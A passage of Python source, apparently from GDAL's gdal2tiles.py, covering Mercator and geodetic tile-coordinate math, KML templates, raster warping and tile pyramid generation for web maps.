Constant 20037508.342789244 comes from the circumference of the Earth in meters,
which is 40 thousand kilometers, the coordinate origin is in the middle of extent.
In fact you can calculate the constant as: 2 * math.pi * 6378137 / 2.0
$ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:3857
Polar areas with abs(latitude) bigger then 85.05112878 are clipped off.
What are zoom level constants (pixels/meter) for pyramid with EPSG:3857?
whole region is on top of pyramid (zoom=0) covered by 256x256 pixels tile,
every lower zoom level resolution is always divided by two
initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062
What is the difference between TMS and Google Maps/QuadTree tile name convention?
The tile raster itself is the same (equal extent, projection, pixel size),
there is just different identification of the same raster tile.
Tiles in TMS are counted from [0,0] in the bottom-left corner, id is XYZ.
Google placed the origin [0,0] to the top-left corner, reference is XYZ.
Microsoft is referencing tiles by a QuadTree name, defined on the website:
http://msdn2.microsoft.com/en-us/library/bb259689.aspx
The lat/lon coordinates are using WGS84 datum, yes?
Yes, all lat/lon we are mentioning should use WGS84 Geodetic Datum.
Well, the web clients like Google Maps are projecting those coordinates by
Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as if
the were on the WGS84 ellipsoid.
From MSDN documentation:
To simplify the calculations, we use the spherical form of projection, not
the ellipsoidal form. Since the projection is used only for map display,
and not for displaying numeric coordinates, we don't need the extra precision
of an ellipsoidal projection. The spherical projection causes approximately
0.33 percent scale distortion in the Y direction, which is not visually
noticeable.
How do I create a raster in EPSG:3857 and convert coordinates with PROJ.4?
You can use standard GIS tools like gdalwarp, cs2cs or gdaltransform.
All of the tools supports -t_srs 'epsg:3857'.
For other GIS programs check the exact definition of the projection:
More info at http://spatialreference.org/ref/user/google-projection/
The same projection is designated as EPSG:3857. WKT definition is in the
official EPSG database.
Proj4 Text:
+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0
+k=1.0 +units=m +nadgrids=@null +no_defs
Human readable WKT format of EPSG:3857:
PROJCS["Google Maps Global Mercator",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4326"]],
PROJECTION["Mercator_1SP"],
PARAMETER["central_meridian",0],
PARAMETER["scale_factor",1],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]
"""
def __init__(self, tileSize=256):
"Initialize the TMS Global Mercator pyramid"
self.tileSize = tileSize
self.initialResolution = 2 * math.pi * 6378137 / self.tileSize
# 156543.03392804062 for tileSize 256 pixels
self.originShift = 2 * math.pi * 6378137 / 2.0
# 20037508.342789244
def LatLonToMeters(self, lat, lon):
"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:3857"
mx = lon * self.originShift / 180.0
my = math.log(math.tan((90 + lat) * math.pi / 360.0)) / (math.pi / 180.0)
my = my * self.originShift / 180.0
return mx, my
def MetersToLatLon(self, mx, my):
"Converts XY point from Spherical Mercator EPSG:3857 to lat/lon in WGS84 Datum"
lon = (mx / self.originShift) * 180.0
lat = (my / self.originShift) * 180.0
lat = 180 / math.pi * (2 * math.atan(math.exp(lat * math.pi / 180.0)) - math.pi / 2.0)
return lat, lon
def PixelsToMeters(self, px, py, zoom):
"Converts pixel coordinates in given zoom level of pyramid to EPSG:3857"
res = self.Resolution(zoom)
mx = px * res - self.originShift
my = py * res - self.originShift
return mx, my
def MetersToPixels(self, mx, my, zoom):
"Converts EPSG:3857 to pyramid pixel coordinates in given zoom level"
res = self.Resolution(zoom)
px = (mx + self.originShift) / res
py = (my + self.originShift) / res
return px, py
def PixelsToTile(self, px, py):
"Returns a tile covering region in given pixel coordinates"
tx = int(math.ceil(px / float(self.tileSize)) - 1)
ty = int(math.ceil(py / float(self.tileSize)) - 1)
return tx, ty
def PixelsToRaster(self, px, py, zoom):
"Move the origin of pixel coordinates to top-left corner"
mapSize = self.tileSize << zoom
return px, mapSize - py
def MetersToTile(self, mx, my, zoom):
"Returns tile for given mercator coordinates"
px, py = self.MetersToPixels(mx, my, zoom)
return self.PixelsToTile(px, py)
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in EPSG:3857 coordinates"
minx, miny = self.PixelsToMeters(tx*self.tileSize, ty*self.tileSize, zoom)
maxx, maxy = self.PixelsToMeters((tx+1)*self.tileSize, (ty+1)*self.tileSize, zoom)
return (minx, miny, maxx, maxy)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in latitude/longitude using WGS84 datum"
bounds = self.TileBounds(tx, ty, zoom)
minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])
return (minLat, minLon, maxLat, maxLon)
def Resolution(self, zoom):
"Resolution (meters/pixel) for given zoom level (measured at Equator)"
# return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom)
return self.initialResolution / (2**zoom)
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
if i != -1:
return i-1
else:
return 0 # We don't want to scale up
def GoogleTile(self, tx, ty, zoom):
"Converts TMS tile coordinates to Google Tile coordinates"
# coordinate origin is moved from bottom-left to top-left corner of the extent
return tx, (2**zoom - 1) - ty
def QuadTree(self, tx, ty, zoom):
"Converts TMS tile coordinates to Microsoft QuadTree"
quadKey = ""
ty = (2**zoom - 1) - ty
for i in range(zoom, 0, -1):
digit = 0
mask = 1 << (i-1)
if (tx & mask) != 0:
digit += 1
if (ty & mask) != 0:
digit += 2
quadKey += str(digit)
return quadKey
class GlobalGeodetic(object):
r"""
TMS Global Geodetic Profile
---------------------------
Functions necessary for generation of global tiles in Plate Carre projection,
EPSG:4326, "unprojected profile".
Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
and you can overlay the tiles on top of OpenLayers base map.
Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).
What coordinate conversions do we need for TMS Global Geodetic tiles?
Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
directly as planar coordinates XY (it is also called Unprojected or Plate
Carre). We need only scaling to pixel pyramid and cutting to tiles.
Pyramid has on top level two tiles, so it is not square but rectangle.
Area [-180,-90,180,90] is scaled to 512x256 pixels.
TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
Rasters are in EPSG:4326 and therefore are compatible with Google Earth.
LatLon <-> Pixels <-> Tiles
WGS84 coordinates Pixels in pyramid Tiles in pyramid
lat/lon XY pixels Z zoom XYZ from TMS
EPSG:4326
.----. ----
/ \ <-> /--------/ <-> TMS
\ / /--------------/
----- /--------------------/
WMS, KML Web Clients, Google Earth TileMapService
"""
def __init__(self, tmscompatible, tileSize=256):
self.tileSize = tileSize
if tmscompatible is not None:
# Defaults the resolution factor to 0.703125 (2 tiles @ level 0)
# Adhers to OSGeo TMS spec
# http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic
self.resFact = 180.0 / self.tileSize
else:
# Defaults the resolution factor to 1.40625 (1 tile @ level 0)
# Adheres OpenLayers, MapProxy, etc default resolution for WMTS
self.resFact = 360.0 / self.tileSize
def LonLatToPixels(self, lon, lat, zoom):
"Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid"
res = self.resFact / 2**zoom
px = (180 + lon) / res
py = (90 + lat) / res
return px, py
def PixelsToTile(self, px, py):
"Returns coordinates of the tile covering region in pixel coordinates"
tx = int(math.ceil(px / float(self.tileSize)) - 1)
ty = int(math.ceil(py / float(self.tileSize)) - 1)
return tx, ty
def LonLatToTile(self, lon, lat, zoom):
"Returns the tile for zoom which covers given lon/lat coordinates"
px, py = self.LonLatToPixels(lon, lat, zoom)
return self.PixelsToTile(px, py)
def Resolution(self, zoom):
"Resolution (arc/pixel) for given zoom level (measured at Equator)"
return self.resFact / 2**zoom
def ZoomForPixelSize(self, pixelSize):
"Maximal scaledown zoom of the pyramid closest to the pixelSize."
for i in range(MAXZOOMLEVEL):
if pixelSize > self.Resolution(i):
if i != 0:
return i-1
else:
return 0 # We don't want to scale up
def TileBounds(self, tx, ty, zoom):
"Returns bounds of the given tile"
res = self.resFact / 2**zoom
return (
tx*self.tileSize*res - 180,
ty*self.tileSize*res - 90,
(tx+1)*self.tileSize*res - 180,
(ty+1)*self.tileSize*res - 90
)
def TileLatLonBounds(self, tx, ty, zoom):
"Returns bounds of the given tile in the SWNE form"
b = self.TileBounds(tx, ty, zoom)
return (b[1], b[0], b[3], b[2])
class Zoomify(object):
"""
Tiles compatible with the Zoomify viewer
----------------------------------------
"""
def __init__(self, width, height, tilesize=256, tileformat='jpg'):
"""Initialization of the Zoomify tile tree"""
self.tilesize = tilesize
self.tileformat = tileformat
imagesize = (width, height)
tiles = (math.ceil(width / tilesize), math.ceil(height / tilesize))
# Size (in tiles) for each tier of pyramid.
self.tierSizeInTiles = []
self.tierSizeInTiles.append(tiles)
# Image size in pixels for each pyramid tierself
self.tierImageSize = []
self.tierImageSize.append(imagesize)
while (imagesize[0] > tilesize or imagesize[1] > tilesize):
imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2))
tiles = (math.ceil(imagesize[0] / tilesize), math.ceil(imagesize[1] / tilesize))
self.tierSizeInTiles.append(tiles)
self.tierImageSize.append(imagesize)
self.tierSizeInTiles.reverse()
self.tierImageSize.reverse()
# Depth of the Zoomify pyramid, number of tiers (zoom levels)
self.numberOfTiers = len(self.tierSizeInTiles)
# Number of tiles up to the given tier of pyramid.
self.tileCountUpToTier = []
self.tileCountUpToTier[0] = 0
for i in range(1, self.numberOfTiers+1):
self.tileCountUpToTier.append(
self.tierSizeInTiles[i-1][0] * self.tierSizeInTiles[i-1][1] +
self.tileCountUpToTier[i-1]
)
def tilefilename(self, x, y, z):
"""Returns filename for tile with given coordinates"""
tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z]
return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256),
"%s-%s-%s.%s" % (z, x, y, self.tileformat))
class GDALError(Exception):
pass
def exit_with_error(message, details=""):
# Message printing and exit code kept from the way it worked using the OptionParser (in case
# someone parses the error output)
sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n")
sys.stderr.write("gdal2tiles.py: error: %s\n" % message)
if details:
sys.stderr.write("\n\n%s\n" % details)
sys.exit(2)
def generate_kml(tx, ty, tz, tileext, tilesize, tileswne, options, children=None, **args):
"""
Template for the KML. Returns filled string.
"""
if not children:
children = []
args['tx'], args['ty'], args['tz'] = tx, ty, tz
args['tileformat'] = tileext
if 'tilesize' not in args:
args['tilesize'] = tilesize
if 'minlodpixels' not in args:
args['minlodpixels'] = int(args['tilesize'] / 2)
if 'maxlodpixels' not in args:
args['maxlodpixels'] = int(args['tilesize'] * 8)
if children == []:
args['maxlodpixels'] = -1
if tx is None:
tilekml = False
args['title'] = options.title
else:
tilekml = True
args['title'] = "%d/%d/%d.kml" % (tz, tx, ty)
args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz)
if tx == 0:
args['drawOrder'] = 2 * tz + 1
elif tx is not None:
args['drawOrder'] = 2 * tz
else:
args['drawOrder'] = 0
url = options.url
if not url:
if tilekml:
url = "../../"
else:
url = ""
s = """<?xml version="1.0" encoding="utf-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Document>
<name>%(title)s</name>
<description></description>
<Style>
<ListStyle id="hideChildren">
<listItemType>checkHideChildren</listItemType>
</ListStyle>
</Style>""" % args
if tilekml:
s += """
<Region>
<LatLonAltBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%(minlodpixels)d</minLodPixels>
<maxLodPixels>%(maxlodpixels)d</maxLodPixels>
</Lod>
</Region>
<GroundOverlay>
<drawOrder>%(drawOrder)d</drawOrder>
<Icon>
<href>%(ty)d.%(tileformat)s</href>
</Icon>
<LatLonBox>
<north>%(north).14f</north>
<south>%(south).14f</south>
<east>%(east).14f</east>
<west>%(west).14f</west>
</LatLonBox>
</GroundOverlay>
""" % args
for cx, cy, cz in children:
csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz)
s += """
<NetworkLink>
<name>%d/%d/%d.%s</name>
<Region>
<LatLonAltBox>
<north>%.14f</north>
<south>%.14f</south>
<east>%.14f</east>
<west>%.14f</west>
</LatLonAltBox>
<Lod>
<minLodPixels>%d</minLodPixels>
<maxLodPixels>-1</maxLodPixels>
</Lod>
</Region>
<Link>
<href>%s%d/%d/%d.kml</href>
<viewRefreshMode>onRegion</viewRefreshMode>
<viewFormat/>
</Link>
</NetworkLink>
""" % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest,
args['minlodpixels'], url, cz, cx, cy)
s += """ </Document>
</kml>
"""
return s
def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''):
"""Scales down query dataset to the tile dataset"""
querysize = dsquery.RasterXSize
tilesize = dstile.RasterXSize
tilebands = dstile.RasterCount
if options.resampling == 'average':
# Function: gdal.RegenerateOverview()
for i in range(1, tilebands+1):
# Black border around NODATA
res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i),
'average')
if res != 0:
exit_with_error("RegenerateOverview() failed on %s, error %d" % (
tilefilename, res))
elif options.resampling == 'antialias':
# Scaling by PIL (Python Imaging Library) - improved Lanczos
array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8)
for i in range(tilebands):
array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i+1),
0, 0, querysize, querysize)
im = Image.fromarray(array, 'RGBA') # Always four bands
im1 = im.resize((tilesize, tilesize), Image.ANTIALIAS)
if os.path.exists(tilefilename):
im0 = Image.open(tilefilename)
im1 = Image.composite(im1, im0, im1)
im1.save(tilefilename, tiledriver)
else:
if options.resampling == 'near':
gdal_resampling = gdal.GRA_NearestNeighbour
elif options.resampling == 'bilinear':
gdal_resampling = gdal.GRA_Bilinear
elif options.resampling == 'cubic':
gdal_resampling = gdal.GRA_Cubic
elif options.resampling == 'cubicspline':
gdal_resampling = gdal.GRA_CubicSpline
elif options.resampling == 'lanczos':
gdal_resampling = gdal.GRA_Lanczos
# Other algorithms are implemented by gdal.ReprojectImage().
dsquery.SetGeoTransform((0.0, tilesize / float(querysize), 0.0, 0.0, 0.0,
tilesize / float(querysize)))
dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling)
if res != 0:
exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res))
def setup_no_data_values(input_dataset, options):
"""
Extract the NODATA values from the dataset or use the passed arguments as override if any
"""
in_nodata = []
if options.srcnodata:
nds = list(map(float, options.srcnodata.split(',')))
if len(nds) < input_dataset.RasterCount:
in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount]
else:
in_nodata = nds
else:
for i in range(1, input_dataset.RasterCount+1):
raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue()
if raster_no_data is not None:
in_nodata.append(raster_no_data)
if options.verbose:
print("NODATA: %s" % in_nodata)
return in_nodata
def setup_input_srs(input_dataset, options):
"""
Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a
WKT representation
Uses in priority the one passed in the command line arguments. If None, tries to extract them
from the input dataset
"""
input_srs = None
input_srs_wkt = None
if options.s_srs:
input_srs = osr.SpatialReference()
input_srs.SetFromUserInput(options.s_srs)
input_srs_wkt = input_srs.ExportToWkt()
else:
input_srs_wkt = input_dataset.GetProjection()
if not input_srs_wkt and input_dataset.GetGCPCount() != 0:
input_srs_wkt = input_dataset.GetGCPProjection()
if input_srs_wkt:
input_srs = osr.SpatialReference()
input_srs.ImportFromWkt(input_srs_wkt)
return input_srs, input_srs_wkt
def setup_output_srs(input_srs, options):
"""
Setup the desired SRS (based on options)
"""
output_srs = osr.SpatialReference()
if options.profile == 'mercator':
output_srs.ImportFromEPSG(3857)
elif options.profile == 'geodetic':
output_srs.ImportFromEPSG(4326)
else:
output_srs = input_srs
return output_srs
def has_georeference(dataset):
return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or
dataset.GetGCPCount() != 0)
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
"""
Returns the input dataset in the expected "destination" SRS.
If the dataset is already in the correct SRS, returns it unmodified
"""
if not from_srs or not to_srs:
raise GDALError("from and to SRS must be defined to reproject the dataset")
if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0):
to_dataset = gdal.AutoCreateWarpedVRT(from_dataset,
from_srs.ExportToWkt(), to_srs.ExportToWkt())
if options and options.verbose:
print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset)
return to_dataset
else:
return from_dataset
def add_gdal_warp_options_to_string(vrt_string, warp_options):
if not warp_options:
return vrt_string
vrt_root = ElementTree.fromstring(vrt_string)
options = vrt_root.find("GDALWarpOptions")
if options is None:
return vrt_string
for key, value in warp_options.items():
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": key})
tb.data(value)
tb.end("Option")
elem = tb.close()
options.insert(0, elem)
return ElementTree.tostring(vrt_root).decode()
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
"""
Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed
"""
# TODO: gbataille - Seems that I forgot tests there
if nodata_values != []:
temp_file = gettempfilename('-gdal2tiles.vrt')
warped_vrt_dataset.GetDriver().CreateCopy(temp_file, warped_vrt_dataset)
with open(temp_file, 'r') as f:
vrt_string = f.read()
vrt_string = add_gdal_warp_options_to_string(
vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})
# TODO: gbataille - check the need for this replacement. Seems to work without
# # replace BandMapping tag for NODATA bands....
# for i in range(len(nodata_values)):
# s = s.replace(
# '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)),
# """
# <BandMapping src="%i" dst="%i">
# <SrcNoDataReal>%i</SrcNoDataReal>
# <SrcNoDataImag>0</SrcNoDataImag>
# <DstNoDataReal>%i</DstNoDataReal>
# <DstNoDataImag>0</DstNoDataImag>
# </BandMapping>
# """ % ((i+1), (i+1), nodata_values[i], nodata_values[i]))
# save the corrected VRT
with open(temp_file, 'w') as f:
f.write(vrt_string)
corrected_dataset = gdal.Open(temp_file)
os.unlink(temp_file)
# set NODATA_VALUE metadata
corrected_dataset.SetMetadataItem(
'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))
if options and options.verbose:
print("Modified warping result saved into 'tiles1.vrt'")
# TODO: gbataille - test replacing that with a gdal write of the dataset (more
# accurately what's used, even if should be the same
with open("tiles1.vrt", "w") as f:
f.write(vrt_string)
return corrected_dataset
def add_alpha_band_to_string_vrt(vrt_string):
# TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha
# To be checked
vrt_root = ElementTree.fromstring(vrt_string)
index = 0
nb_bands = 0
for subelem in list(vrt_root):
if subelem.tag == "VRTRasterBand":
nb_bands += 1
color_node = subelem.find("./ColorInterp")
if color_node is not None and color_node.text == "Alpha":
raise Exception("Alpha band already present")
else:
if nb_bands:
# This means that we are one element after the Band definitions
break
index += 1
tb = ElementTree.TreeBuilder()
tb.start("VRTRasterBand",
{'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"})
tb.start("ColorInterp", {})
tb.data("Alpha")
tb.end("ColorInterp")
tb.end("VRTRasterBand")
elem = tb.close()
vrt_root.insert(index, elem)
warp_options = vrt_root.find(".//GDALWarpOptions")
tb = ElementTree.TreeBuilder()
tb.start("DstAlphaBand", {})
tb.data(str(nb_bands + 1))
tb.end("DstAlphaBand")
elem = tb.close()
warp_options.append(elem)
# TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place?
tb = ElementTree.TreeBuilder()
tb.start("Option", {"name": "INIT_DEST"})
tb.data("0")
tb.end("Option")
elem = tb.close()
warp_options.append(elem)
return ElementTree.tostring(vrt_root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
"""
Handles dataset with 1 or 3 bands, i.e. without alpha channel, in the case the nodata value has
not been forced by options
"""
if warped_vrt_dataset.RasterCount in [1, 3]:
tempfilename = gettempfilename('-gdal2tiles.vrt')
warped_vrt_dataset.GetDriver().CreateCopy(tempfilename, warped_vrt_dataset)
with open(tempfilename) as f:
orig_data = f.read()
alpha_data = add_alpha_band_to_string_vrt(orig_data)
with open(tempfilename, 'w') as f:
f.write(alpha_data)
warped_vrt_dataset = gdal.Open(tempfilename)
os.unlink(tempfilename)
if options and options.verbose:
print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
# TODO: gbataille - test replacing that with a gdal write of the dataset (more
# accurately what's used, even if should be the same
with open("tiles1.vrt", "w") as f:
f.write(alpha_data)
return warped_vrt_dataset
def nb_data_bands(dataset):
"""
Return the number of data (non-alpha) bands of a gdal dataset
"""
alphaband = dataset.GetRasterBand(1).GetMaskBand()
if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or
dataset.RasterCount == 4 or
dataset.RasterCount == 2):
return dataset.RasterCount - 1
else:
return dataset.RasterCount
def gettempfilename(suffix):
"""Returns a temporary filename"""
if '_' in os.environ:
# tempfile.mktemp() crashes on some Wine versions (the one of Ubuntu 12.04 particularly)
if os.environ['_'].find('wine') >= 0:
tmpdir = '.'
if 'TMP' in os.environ:
tmpdir = os.environ['TMP']
import time
import random
random.seed(time.time())
random_part = 'file%d' % random.randint(0, 1000000000)
return os.path.join(tmpdir, random_part + suffix)
return tempfile.mktemp(suffix)
def create_base_tile(tile_job_info, tile_detail, options, queue=None):
gdal.AllRegister()
dataBandsCount = tile_job_info.nb_data_bands
output = tile_job_info.output_file_path
tileext = tile_job_info.tile_extension
tilesize = tile_job_info.tile_size
options = tile_job_info.options
tilebands = dataBandsCount + 1
ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
mem_drv = gdal.GetDriverByName('MEM')
out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
alphaband = ds.GetRasterBand(1).GetMaskBand()
tx = tile_detail.tx
ty = tile_detail.ty
tz = tile_detail.tz
rx = tile_detail.rx
ry = tile_detail.ry
rxsize = tile_detail.rxsize
rysize = tile_detail.rysize
wx = tile_detail.wx
wy = tile_detail.wy
wxsize = tile_detail.wxsize
wysize = tile_detail.wysize
querysize = tile_detail.querysize
# Tile dataset in memory
tilefilename = os.path.join(
output, str(tz), str(tx), "%s.%s" % (ty, tileext))
dstile = mem_drv.Create('', tilesize, tilesize, tilebands)
data = alpha = None
if options.verbose:
print("\tReadRaster Extent: ",
(rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))
# Query is in 'nearest neighbour' but can be bigger in then the tilesize
# We scale down the query to the tilesize by supplied algorithm.
if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
band_list=list(range(1, dataBandsCount+1)))
alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)
# The tile in memory is a transparent file by default. Write pixel values into it if
# any
if data:
if tilesize == querysize:
# Use the ReadRaster result directly in tiles ('nearest neighbour' query)
dstile.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount+1)))
dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
# Note: For source drivers based on WaveLet compression (JPEG2000, ECW,
# MrSID) the ReadRaster function returns high-quality raster (not ugly
# nearest neighbour)
# TODO: Use directly 'near' for WaveLet files
else:
# Big ReadRaster query in memory scaled to the tilesize - all but 'near'
# algo
dsquery = mem_drv.Create('', querysize, querysize, tilebands)
# TODO: fill the null value in case a tile without alpha is produced (now
# only png tiles are supported)
dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
band_list=list(range(1, dataBandsCount+1)))
dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])
scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
tilefilename=tilefilename)
del dsquery
# Force freeing the memory to make sure the C++ destructor is called and the memory as well as
# the file locks are released
del ds
del data
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_drv.CreateCopy(tilefilename, dstile, strict=0)
del dstile
# Create a KML file for this tile.
if tile_job_info.kml:
kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty)
if not options.resume or not os.path.exists(kmlfilename):
with open(kmlfilename, 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
tile_job_info.tile_swne, tile_job_info.options
).encode('utf-8'))
if queue:
queue.put("tile %s %s %s" % (tx, ty, tz))
def create_overview_tiles(tile_job_info, output_folder, options):
"""Generation of the overview tiles (higher in the pyramid) based on existing tiles"""
mem_driver = gdal.GetDriverByName('MEM')
tile_driver = tile_job_info.tile_driver
out_driver = gdal.GetDriverByName(tile_driver)
tilebands = tile_job_info.nb_data_bands + 1
# Usage of existing tiles: from 4 underlying tiles generate one as overview.
tcount = 0
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
tcount += (1 + abs(tmaxx-tminx)) * (1 + abs(tmaxy-tminy))
ti = 0
if tcount == 0:
return
if not options.quiet:
print("Generating Overview Tiles:")
progress_bar = ProgressBar(tcount)
progress_bar.start()
for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
for ty in range(tmaxy, tminy - 1, -1):
for tx in range(tminx, tmaxx + 1):
ti += 1
ytile = GDAL2Tiles.getYtile(ty, tz, options)
tilefilename = os.path.join(output_folder,
str(tz),
str(tx),
"%s.%s" % (ytile, tile_job_info.tile_extension))
if options.verbose:
print(ti, '/', tcount, tilefilename)
if options.resume and os.path.exists(tilefilename):
if options.verbose:
print("Tile generation skipped because of --resume")
else:
progress_bar.log_progress()
continue
# Create directories for the tile
if not os.path.exists(os.path.dirname(tilefilename)):
os.makedirs(os.path.dirname(tilefilename))
dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
2 * tile_job_info.tile_size, tilebands)
# TODO: fill the null value
dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
tilebands)
# TODO: Implement more clever walking on the tiles with cache functionality
# probably walk should start with reading of four tiles from top left corner
# Hilbert curve
children = []
# Read the tiles and write them to query window
for y in range(2 * ty, 2 * ty + 2):
for x in range(2 * tx, 2 * tx + 2):
minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
if x >= minx and x <= maxx and y >= miny and y <= maxy:
ytile2 = GDAL2Tiles.getYtile(y, tz+1, options)
dsquerytile = gdal.Open(
os.path.join(output_folder, str(tz + 1), str(x),
"%s.%s" % (ytile2, tile_job_info.tile_extension)),
gdal.GA_ReadOnly)
if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0):
tileposy = 0
else:
tileposy = tile_job_info.tile_size
if tx:
tileposx = x % (2 * tx) * tile_job_info.tile_size
elif tx == 0 and x == 1:
tileposx = tile_job_info.tile_size
else:
tileposx = 0
dsquery.WriteRaster(
tileposx, tileposy, tile_job_info.tile_size,
tile_job_info.tile_size,
dsquerytile.ReadRaster(0, 0,
tile_job_info.tile_size,
tile_job_info.tile_size),
band_list=list(range(1, tilebands + 1)))
children.append([x, y, tz + 1])
scale_query_to_tile(dsquery, dstile, tile_driver, options,
tilefilename=tilefilename)
# Write a copy of tile to png/jpg
if options.resampling != 'antialias':
# Write a copy of tile to png/jpg
out_driver.CreateCopy(tilefilename, dstile, strict=0)
if options.verbose:
print("\tbuild from zoom", tz + 1,
" tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
(2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))
# Create a KML file for this tile.
if tile_job_info.kml:
with open(os.path.join(
output_folder,
'%d/%d/%d.kml' % (tz, tx, ty)
), 'wb') as f:
f.write(generate_kml(
tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
get_tile_swne(tile_job_info, options), options, children
).encode('utf-8'))
if not options.verbose and not options.quiet:
progress_bar.log_progress()
def optparse_init():
"""Prepare the option parser for input (argv)"""
from optparse import OptionParser, OptionGroup
usage = "Usage: %prog [options] input_file [output]"
p = OptionParser(usage, version="%prog " + __version__)
p.add_option("-p", "--profile", dest='profile',
type='choice', choices=profile_list,
help=("Tile cutting profile (%s) - default 'mercator' "
"(Google Maps compatible)" % ",".join(profile_list)))
p.add_option("-r", "--resampling", dest="resampling",
type='choice', choices=resampling_list,
help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
p.add_option("-s", "--s_srs", dest="s_srs", metavar="SRS",
help="The spatial reference system used for the source input data")
p.add_option("-z", "--zoom", dest="zoom",
help="Zoom levels to render (format:'2-5' or '10').")
p.add_option("-e", "--resume", dest="resume", action="store_true",
help="Resume mode. Generate only missing files.")
p.add_option("-a", "--srcnodata", dest="srcnodata", metavar="NODATA",
help="NODATA transparency value to assign to the input data")
p.add_option("-d", "--tmscompatible", dest="tmscompatible", action="store_true",
help=("When using the geodetic profile, specifies the base resolution "
"as 0.703125 or 2 tiles at zoom level 0."))
